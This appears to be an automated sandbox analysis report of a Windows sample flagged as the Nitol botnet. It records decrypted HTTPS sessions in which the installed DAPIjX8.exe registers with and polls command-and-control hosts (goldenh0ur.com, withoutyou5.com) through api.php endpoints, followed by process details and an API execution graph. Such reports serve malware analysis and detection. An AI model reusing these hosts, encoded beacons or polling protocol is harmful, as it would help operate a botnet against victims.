                                Data Raw: 42 4d de b2 08 00 00 00 00 00 36 00 00 00 28 00 00 00 7a 01 00 00 79 01 00 00 01 00 20 00 00 00 00 00 a8 b2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8f 08 00 00 67 50 55 89 82 81 c2 05 98 03 00 00 e6 ca ff b1 6f 08 68 05 67 08 00 68 63 08 00 00 35 60 ab 74 8d 51 50 e8 62 08 00 00 e4 cc 14 c9 a4 89 ec 14 66 08 00 53 32 5e 57 6a 0c 50 6a 65 01 81 84 24 ab 08 00 00 54 e5 58 6a 15 51 6a 6e 3c 62 6c 5a 0d 3b 66 89 e3 2c ce 00 67 08 66 89 e3 2c d4 00 67 08 58 6a 55 6e 89 84 43 d0 00 00 67 50 6a 2e 01 81 84 24 bd 08 00 00 3f 62 64 66 ee 8c 24 dc 67 08 00 58 ee a4 24 b0 67 08 00 89 0b 2c 34 89 cb 2c b8 00 67 08 89 ac 43 cc 00 00 67 81 ac 24 d3 08 00 00 ee a4 24 ac 67 08 00 89 cb 2c e0 00 67 08 66 89 eb 2c cc 00 67 08 66 89 fb 2c ce 00 67 08 66 89 f3 2c d2 00 67 08 66 89 e3 2c da 00 67 08 66 89 f3 2c dc 00 67 08 66 89 f3 2c de 00 67 08 c6 44 43 34 53 88 33 2c 3d 66 a0 4c 24 3e 02 6d c6 44 43 48 70 66 a0 4c 24 50 2b 67 c6 44 43 5a 61 88 23 2c 53 66 a0 4c 24 54 2b 61 c6 44 43 5e 62 88 2b 2c 57 c6 [TRUNCATED]
                                Data Ascii: BM6(zy gPUohghc5`tQPbfS2^WjPje$TXjQjn<blZ;f,gf,gXjUnCgPj.$?bdf$gX$g,4,gCg$$g,gf,gf,gf,gf,gf,gf,gDC4S3,=fL$>mDCHpfL$P+gDCZa#,SfL$T+aDC^b+,W#,XaD$YD$=qAfL$D1aLCNf#,GtD$.iTCBDCCA3,L3,MfL$Nkf#,\VL$9nDCWtuL$aT$D$XLClDCmotkDCat,gF,gCg}sh.$$|Cg$kti$gomY,gLCeLC|LCqC


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.849716104.21.17.454435296C:\Program Files (x86)\6fjdie\DAPIjX8.exe
                                TimestampBytes transferredDirectionData
                                2024-08-27 07:50:02 UTC281OUTPOST /api.php/common/getdomain HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/json
                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                                Content-Length: 18
                                Host: cacer.goldenh0ur.com
                                2024-08-27 07:50:02 UTC18OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 43 55 30 3d
                                Data Ascii: A0TxZkW19VWhYOCU0=
                                2024-08-27 07:50:02 UTC734INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:50:02 GMT
                                Content-Type: text/html; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Authorization
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XB4POdOxFbep%2FfMblYSwJqtJmkpFVTn9tCglDDzxIv7RC8Gh%2FP3sRmr0mP7VS1NMQO46FmOoZdKTnMXE5WXIkiBRDWBsvAZH2ihPtWSuDFlQEMjU0g%2B4SFYkKscuM%2BXyoKZSwIZlEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a77e87b844299-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-08-27 07:50:02 UTC48INData Raw: 32 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 2c 22 44 6f 6d 61 69 6e 22 3a 22 6d 76 63 2e 77 69 74 68 6f 75 74 79 6f 75 35 2e 63 6f 6d 22 7d 0d 0a
                                Data Ascii: 2a{"Token":1,"Domain":"mvc.withoutyou5.com"}
                                2024-08-27 07:50:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.849717104.26.7.1274435296C:\Program Files (x86)\6fjdie\DAPIjX8.exe
                                TimestampBytes transferredDirectionData
                                2024-08-27 07:50:03 UTC283OUTPOST /api.php/common/receivejson HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/json
                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                                Content-Length: 482
                                Host: mvc.withoutyou5.com
                                2024-08-27 07:50:03 UTC482OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 42 67 67 49 48 42 5a 38 57 31 64 5a 58 49 46 6f 46 67 34 57 43 52 45 47 47 67 6b 43 45 42 6f 47 47 68 41 57 48 42 61 41 57 30 64 45 65 6c 6c 64 56 52 59 4f 46 67 55 51 43 42 45 4a 42 78 59 63 46 6e 74 6e 67 56 70 53 57 78 59 4f 46 68 35 39 59 56 64 47 57 30 64 62 55 6b 51 59 59 32 46 61 56 46 74 44 52 78 67 4a 43 42 68 6f 52 6c 73 43 42 42 31 57 59 55 52 51 41 67 51 57 48 42 5a 48 57 31 4a 45 51 31 6c 47 56 52 59 4f 46 6d 4e 68 57 6c 52 62 51 30 63 59 64 46 56 53 56 56 70 55 56 55 59 57 48 42 5a 58 53 45 56 72 58 57 42 4f 46 67 34 57 67 56 70 45 56 56 77 67 5a 69 45 59 64 31 74 47 56 53 42 6b 66 53 45 47 47 48 64 6f 5a 52 67 43 41 67 67 49 47 48 67 59 42 68 6f 45 43 42 68 7a 67 45 34 57 48 42 5a 5a 56 30 52 68 51
                                Data Ascii: A0TxZkW19VWhYOBggIHBZ8W1dZXIFoFg4WCREGGgkCEBoGGhAWHBaAW0dEelldVRYOFgUQCBEJBxYcFntngVpSWxYOFh59YVdGW0dbUkQYY2FaVFtDRxgJCBhoRlsCBB1WYURQAgQWHBZHW1JEQ1lGVRYOFmNhWlRbQ0cYdFVSVVpUVUYWHBZXSEVrXWBOFg4WgVpEVVwgZiEYd1tGVSBkfSEGGHdoZRgCAggIGHgYBhoECBhzgE4WHBZZV0RhQ
                                2024-08-27 07:50:04 UTC696INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:50:04 GMT
                                Content-Type: text/html; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Authorization
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AFKL0UMK0a%2Fhfj1UI9tGNS4BWTeqR72BLwQO%2B3n3DTsC8YDowF5cuI%2B3fCrLD8TYXD3sj5TfKf3TCUklJVBfp2jMSP9Pa0JfWh2BNSWHGgo50w1xXGvK1axinIC7s8NvvQS41kQ%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a77f1ed1b4388-EWR
                                2024-08-27 07:50:04 UTC56INData Raw: 33 32 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 35 2c 22 6d 65 73 73 61 67 65 22 3a 22 61 36 69 34 6f 63 74 34 6a 34 69 39 6b 6f 62 35 32 6e 30 70 63 6f 32 76 66 6d 22 7d 0d 0a
                                Data Ascii: 32{"Token":5,"message":"a6i4oct4j4i9kob52n0pco2vfm"}
                                2024-08-27 07:50:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.849718104.26.7.1274435296C:\Program Files (x86)\6fjdie\DAPIjX8.exe
                                TimestampBytes transferredDirectionData
                                2024-08-27 07:50:05 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/json
                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                                MAC: a6i4oct4j4i9kob52n0pco2vfm
                                Content-Length: 38
                                Host: mvc.withoutyou5.com
                                2024-08-27 07:50:05 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 43 45 30 3d
                                Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CCE0=
                                2024-08-27 07:50:05 UTC546INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:50:05 GMT
                                Content-Type: application/json
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=faeJeEDbwEPeRZaqvHcEv5Tat1Hp5XckwlOdRBQpPStSVC0Is18UoN%2FLB3%2FKxlq%2FTBHTtzZqtqjASbSy2e%2FXZZmqZW6tY9VuRGG9xCM%2BXFAv6NxXtNKZsnP082XA9q7b%2FZpMYZc%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a77fa4e0f42a5-EWR
                                2024-08-27 07:50:05 UTC46INData Raw: 32 38 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 2c 22 54 61 73 6b 53 6c 65 65 70 22 3a 36 7d 0d 0a
                                Data Ascii: 28{"Token":117,"message":"","TaskSleep":6}
                                2024-08-27 07:50:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.849719104.26.7.1274435296C:\Program Files (x86)\6fjdie\DAPIjX8.exe
                                TimestampBytes transferredDirectionData
                                2024-08-27 07:50:14 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/json
                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                                MAC: a6i4oct4j4i9kob52n0pco2vfm
                                Content-Length: 38
                                Host: mvc.withoutyou5.com
                                2024-08-27 07:50:14 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 54 51 3d 3d
                                Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CTQ==
                                2024-08-27 07:50:15 UTC540INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:50:15 GMT
                                Content-Type: application/json
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KqvxbPE4K2aqUMAZWT%2BIyXFSxVaii7de9mnO7NP3f8MNS3QB7KjyBpzvid4GdFu1yMmJE9N7OyDv16nNAXzUTgBOirD4fBi687pb9U9wmBIHODuk5k37%2B5%2Bh5VeAMBDpzqrVYIg%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a78349b024380-EWR
                                2024-08-27 07:50:15 UTC32INData Raw: 31 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d 0d 0a
                                Data Ascii: 1a{"Token":117,"message":""}
                                2024-08-27 07:50:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.849720104.26.7.1274435296C:\Program Files (x86)\6fjdie\DAPIjX8.exe
                                TimestampBytes transferredDirectionData
                                2024-08-27 07:50:23 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/json
                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                                MAC: a6i4oct4j4i9kob52n0pco2vfm
                                Content-Length: 38
                                Host: mvc.withoutyou5.com
                                2024-08-27 07:50:23 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 54 51 3d 3d
                                Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CTQ==
                                2024-08-27 07:50:24 UTC542INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:50:24 GMT
                                Content-Type: application/json
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=31VuVDtsC%2BSAAQBmq75ZWLztVGRP3hES6hQCRnCyzNSg9qbOtQYNiUt2jkzFJtadARG9Uei1sS7TM8FAyhkSPOs3OXcEls4UjqCQS%2FMRio0hmQ3Q%2FLQq%2FKwwPdjXhb7t8kwt3xs%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a786e3f6c78dc-EWR
                                2024-08-27 07:50:24 UTC32INData Raw: 31 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d 0d 0a
                                Data Ascii: 1a{"Token":117,"message":""}
                                2024-08-27 07:50:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.849721104.26.7.1274435296C:\Program Files (x86)\6fjdie\DAPIjX8.exe
                                TimestampBytes transferredDirectionData
                                2024-08-27 07:50:31 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/json
                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                                MAC: a6i4oct4j4i9kob52n0pco2vfm
                                Content-Length: 38
                                Host: mvc.withoutyou5.com
                                2024-08-27 07:50:31 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 54 51 3d 3d
                                Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CTQ==
                                2024-08-27 07:50:32 UTC538INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:50:32 GMT
                                Content-Type: application/json
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wXi5CnERUqNbBTwg2AYgeA7rHiHUYXNCjPDSoYyAlIbi%2BjvXgweAl91Vwb7BxP%2BSBtMRQKEsSdu4zB6acbllIW1e0ojDmG7QsgVC6K7968Aa2TZu2CzksXVr8aGi7V6BB8XhvAc%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a78a1386817e5-EWR
                                2024-08-27 07:50:32 UTC32INData Raw: 31 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d 0d 0a
                                Data Ascii: 1a{"Token":117,"message":""}
                                2024-08-27 07:50:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.849722104.26.7.1274435296C:\Program Files (x86)\6fjdie\DAPIjX8.exe
                                TimestampBytes transferredDirectionData
                                2024-08-27 07:50:37 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/json
                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                                MAC: a6i4oct4j4i9kob52n0pco2vfm
                                Content-Length: 38
                                Host: mvc.withoutyou5.com
                                2024-08-27 07:50:37 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 54 51 3d 3d
                                Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CTQ==
                                2024-08-27 07:50:38 UTC546INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:50:38 GMT
                                Content-Type: application/json
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FO0orI4OSEuLYbDaVx8vSGM7yHoXamA%2FKC%2BawL41BaTMJ6xjJErNl%2FC2yjhoGzS6%2Fk2uLeSTmlRMzFn2QkMjIB95IQiujIcRybQHQsMaLbHPyT9mrjfwEwWFq7h8OQrSt7zGf%2FA%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a78c79bd517c1-EWR
                                2024-08-27 07:50:38 UTC32INData Raw: 31 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d 0d 0a
                                Data Ascii: 1a{"Token":117,"message":""}
                                2024-08-27 07:50:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.849723104.26.7.1274435296C:\Program Files (x86)\6fjdie\DAPIjX8.exe
                                TimestampBytes transferredDirectionData
                                2024-08-27 07:50:46 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/json
                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                                MAC: a6i4oct4j4i9kob52n0pco2vfm
                                Content-Length: 38
                                Host: mvc.withoutyou5.com
                                2024-08-27 07:50:46 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 54 51 3d 3d
                                Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CTQ==
                                2024-08-27 07:50:46 UTC540INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:50:46 GMT
                                Content-Type: application/json
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yb8D8snKFwEE4IExXzx%2F%2F76M2FtjivuEtpyzGMSN2JUZLd0K4tbkUPiLM6MRyQSKIfOGiIKQbkqPWd7SGoH1a2xh2ZUSJQDcyfrLhLOTeqz%2FVD0k1bWLrxW2SmuvXoNBqNoZtW4%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a78faabe3c420-EWR
                                2024-08-27 07:50:46 UTC32INData Raw: 31 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d 0d 0a
                                Data Ascii: 1a{"Token":117,"message":""}
                                2024-08-27 07:50:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.849724104.26.7.1274435296C:\Program Files (x86)\6fjdie\DAPIjX8.exe
                                TimestampBytes transferredDirectionData
                                2024-08-27 07:50:52 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/json
                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                                MAC: a6i4oct4j4i9kob52n0pco2vfm
                                Content-Length: 38
                                Host: mvc.withoutyou5.com
                                2024-08-27 07:50:52 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 54 51 3d 3d
                                Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CTQ==
                                2024-08-27 07:50:53 UTC540INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:50:52 GMT
                                Content-Type: application/json
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ZfUDhFpIejQJaZmSG%2B4Q8wEVLfuhpvFcL7JMkMt749NdJJYofsI74Pi85YC9RRuLU%2By3TDwUHrQf93gOy32E0odVRm6uFbpxLSn%2FO4HtAn5NXUinpgEjExW6GmZvfBQ5XIiVrI%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a79212eab4381-EWR
                                2024-08-27 07:50:53 UTC32INData Raw: 31 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d 0d 0a
                                Data Ascii: 1a{"Token":117,"message":""}
                                2024-08-27 07:50:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.849725104.26.7.1274435296C:\Program Files (x86)\6fjdie\DAPIjX8.exe
                                TimestampBytes transferredDirectionData
                                2024-08-27 07:50:59 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/json
                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                                MAC: a6i4oct4j4i9kob52n0pco2vfm
                                Content-Length: 38
                                Host: mvc.withoutyou5.com
                                2024-08-27 07:50:59 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 54 51 3d 3d
                                Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CTQ==
                                2024-08-27 07:51:00 UTC542INHTTP/1.1 200 OK
                                Date: Tue, 27 Aug 2024 07:51:00 GMT
                                Content-Type: application/json
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eyCPCFuPGC8QBvuRZp8pWn25Xp%2Fjh%2FWbKkzw7jRdT8Gt%2FF%2B0mg70rJEONhYTSyCISOYeprO446a4jT7nYZEdJcsHT9L7KMyOLu68PHuaWplLw5tRcPmJbJW8UVKSiFNKsouW6Uc%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8b9a794eedc941ff-EWR
                                2024-08-27 07:51:00 UTC32INData Raw: 31 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d 0d 0a
                                Data Ascii: 1a{"Token":117,"message":""}
                                2024-08-27 07:51:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:03:47:58
                                Start date:27/08/2024
                                Path:C:\Users\user\Desktop\pXm5oVO3Go.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\pXm5oVO3Go.exe"
                                Imagebase:0x400000
                                File size:3'656'704 bytes
                                MD5 hash:64A2F030C7C91762485EE16BC8A12E4F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:3
                                Start time:03:47:59
                                Start date:27/08/2024
                                Path:C:\Windows\System32\OpenWith.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                Imagebase:0x7ff7d66e0000
                                File size:123'984 bytes
                                MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:9
                                Start time:03:49:59
                                Start date:27/08/2024
                                Path:C:\Program Files (x86)\6fjdie\DAPIjX8.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\6fjdie\DAPIjX8.exe"
                                Imagebase:0x400000
                                File size:6'453'568 bytes
                                MD5 hash:C8E8EEAF5464AF1A188B3DC12C890813
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000009.00000002.3247531468.0000000010064000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000009.00000002.3246471111.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000009.00000002.3246679220.00000000032FE000.00000040.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 0%, ReversingLabs
                                Reputation:low
                                Has exited:false

                                Target ID:10
                                Start time:03:50:11
                                Start date:27/08/2024
                                Path:C:\Program Files (x86)\6fjdie\DAPIjX8.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\6fjdie\DAPIjX8.exe"
                                Imagebase:0x400000
                                File size:6'453'568 bytes
                                MD5 hash:C8E8EEAF5464AF1A188B3DC12C890813
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:11
                                Start time:03:50:19
                                Start date:27/08/2024
                                Path:C:\Program Files (x86)\6fjdie\DAPIjX8.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\6fjdie\DAPIjX8.exe"
                                Imagebase:0x400000
                                File size:6'453'568 bytes
                                MD5 hash:C8E8EEAF5464AF1A188B3DC12C890813
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:4.7%
                                  Dynamic/Decrypted Code Coverage:80.8%
                                  Signature Coverage:25.8%
                                  Total number of Nodes:918
                                  Total number of Limit Nodes:22
                                  execution_graph 41867 40de00 FindResourceW 41868 40de22 41867->41868 41869 40de26 41867->41869 41872 40dd90 LoadResource LockResource SizeofResource 41869->41872 41871 40de2e 41872->41871 41873 40eb30 SetUnhandledExceptionFilter 41874 40eb79 41873->41874 41877 40eb96 41873->41877 41904 406620 69 API calls 41874->41904 41876 40eb8c 41905 639c94 72 API calls std::locale::_Locimp::_Locimp_Addfac 41876->41905 41898 40ec57 41877->41898 41899 54456a 41877->41899 41882 40ebda InitCommonControlsEx 41907 543a2c 103 API calls 2 library calls 41882->41907 41884 40ebfc 41908 544e31 98 API calls 41884->41908 41886 40ec03 GdiplusStartup 41887 40ec3d 41886->41887 41888 40ec24 41886->41888 41889 40ec72 41887->41889 41890 40ec4d 41887->41890 41909 406620 69 API calls 41888->41909 41912 5373cc 65 API calls _malloc 41889->41912 41911 5373cc 65 API calls _malloc 41890->41911 41894 40ec33 41910 639c94 72 API calls std::locale::_Locimp::_Locimp_Addfac 41894->41910 41895 40ec7c 41895->41898 41913 4103a0 102 API calls 4 library calls 41895->41913 41914 54dc5b 41899->41914 41901 544579 41902 40ebb4 GetClassInfoW 41901->41902 41925 54d782 8 API calls 2 library calls 41901->41925 41906 541f30 108 API calls 2 library calls 41902->41906 41904->41876 41905->41877 41906->41882 41907->41884 41908->41886 41909->41894 41910->41887 41911->41898 41912->41895 41913->41898 41917 54dc67 __EH_prolog3 41914->41917 41916 54dcb5 41946 54d716 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 41916->41946 41917->41916 41926 54d98c TlsAlloc 41917->41926 41930 54d874 EnterCriticalSection 41917->41930 41945 5381c8 LocalAlloc RaiseException __EH_prolog3 std::locale::_Init 